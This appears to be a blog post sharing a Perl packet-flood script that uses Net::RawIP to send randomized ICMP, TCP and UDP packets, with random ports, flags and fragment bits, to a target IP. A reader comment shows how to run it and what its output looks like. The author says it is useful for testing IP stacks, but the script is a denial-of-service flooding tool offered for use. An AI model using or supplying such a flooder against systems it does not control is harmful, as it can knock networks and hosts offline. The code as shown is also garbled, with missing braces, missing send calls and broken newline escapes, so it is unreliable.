Packet Flooder Script

I considered for a while whether or not to post this here.
Ultimately I decided to go ahead and do it for a couple of reasons:

1. This isn’t anything special, there are myriad similar (or better) tools out there that do the same thing.
2. It is actually useful for testing IP stacks on various devices.

And so, here it is, a perl based packet flood script.
It’s got a few things that make it interesting:

1. Ports are chosen randomly for TCP and UDP.
2. ICMP type codes are chosen randomly.
3. TCP flags are chosen randomly.
4. The fragment bit is un/set randomly.

#!/usr/bin/perl -w
# =================================================
# simple network flooder script
# takes type of flood (icmp, tcp, udp) as param
# optionally takes dest ip and packet count
# =================================================
my $VERSION = 0.5;
# =================================================
use strict;
use Net::RawIP;

my $flood = shift or &usage();
my $dstip = shift || '';
my $pktct = shift || 100;

&icmpflood($dstip, $pktct) if $flood =~ 'icmp';
&tcpflood($dstip, $pktct) if $flood =~ 'tcp';
&udpflood($dstip, $pktct) if $flood =~ 'udp';

sub icmpflood() {
   my($dstip, $pktct, $code, $type, $frag);
   $dstip = shift;
   $pktct = shift;

   print "nstarting flood to $dstipn";
   for(my $i=0; $i <= $pktct; $i++) {

      $code = int(rand(255));
      $type = int(rand(255));
      $frag = int(rand(2));

      my $packet = new Net::RawIP({
         ip => {
            daddr => $dstip,
            frag_off => $frag,
         icmp => {
            code => $code,
            type => $type,

      print "sent icmp $type->$code, frag: $fragn";
   print "nflood completenn";

sub tcpflood() {
   my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
$syn, $ack);
   $dstip = shift;
   $pktct = shift;
   print "nstarting flood to $dstipn";
   for(my $i=0; $i <= $pktct; $i++) {

      $sport = int(rand(65535));
      $dport = int(rand(65535));
      $frag = int(rand(2));
      $urg = int(rand(2));
      $psh = int(rand(2));
      $rst = int(rand(2));
      $fin = int(rand(2));
      $syn = int(rand(2));
      $ack = int(rand(2));

      my $packet = new Net::RawIP({
         ip => {
            daddr => $dstip,
            frag_off => $frag,
         tcp => {
            source => $sport,
            dest => $dport,
            urg => $urg,
            psh => $psh,
            rst => $rst,
            fin => $fin,
            syn => $syn,
            ack => $ack,

      print "sent tcp packet from $sport to $dport, frag: $frag, psh:
$psh, rst: $rst, fin: $fin, syn: $syn, ack: $ackn";
   print "nflood completenn";

sub udpflood() {
   my($dstip, $pktct, $sport, $dport, $frag);
   $dstip = shift;
   $pktct = shift;

   print "nstarting flood to $dstipn";
   for(my $i=0; $i <= $pktct; $i++) {

      $sport = int(rand(255));
      $dport = int(rand(255));
      $frag = int(rand(2));

      my $packet = new Net::RawIP({
         ip => {
            daddr => $dstip,
            frag_off => $frag,
         udp => {
            source => $sport,
            dest => $dport,

      print "sent udp packet from $sport to $dport, frag: $fragn";
   print "nflood completenn";

sub usage() {
   print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packetcount


   $0 [tcp udp icmp]  nn";
   exit 0;

2 thoughts on “Packet Flooder Script”

  1. Hey anon.
    I'm not sure why you're seeing that error. I just copy/pasted the code as I have it above into my system, to see if maybe things have changed in the years since I initially wrote this script. It seems to be working still, at least on perl v5.10.1 using the ubuntu packaged version of libnet-rawip-perl.

    Here's an example of how to run it:
    $ sudo ./ tcp localhost 10

    the options I've specified are:
    * tcp = use tcp flood mode
    * localhost = destiniation of flood
    * 10 = send 10 packets)

    Here's what you should see if it's working:

    starting flood to localhost
    sent tcp packet from 63603 to 12185, frag: 0, psh:
    0, rst: 1, fin: 0, syn: 0, ack: 1
    sent tcp packet from 23985 to 59992, frag: 1, psh:
    0, rst: 0, fin: 0, syn: 0, ack: 0
    sent tcp packet from 45043 to 48773, frag: 0, psh:
    0, rst: 1, fin: 0, syn: 1, ack: 1
    sent tcp packet from 27944 to 11086, frag: 0, psh:
    1, rst: 0, fin: 1, syn: 1, ack: 1
    sent tcp packet from 46149 to 37290, frag: 0, psh:
    1, rst: 1, fin: 0, syn: 1, ack: 0
    sent tcp packet from 47262 to 25355, frag: 0, psh:
    1, rst: 1, fin: 1, syn: 0, ack: 1
    sent tcp packet from 11141 to 44979, frag: 1, psh:
    0, rst: 1, fin: 1, syn: 1, ack: 0
    sent tcp packet from 9606 to 18614, frag: 0, psh:
    0, rst: 0, fin: 0, syn: 1, ack: 1
    sent tcp packet from 47445 to 60593, frag: 0, psh:
    0, rst: 0, fin: 0, syn: 0, ack: 1
    sent tcp packet from 49703 to 37715, frag: 1, psh:
    1, rst: 0, fin: 0, syn: 0, ack: 0
    sent tcp packet from 41685 to 8108, frag: 0, psh:
    1, rst: 1, fin: 1, syn: 1, ack: 1

    flood complete

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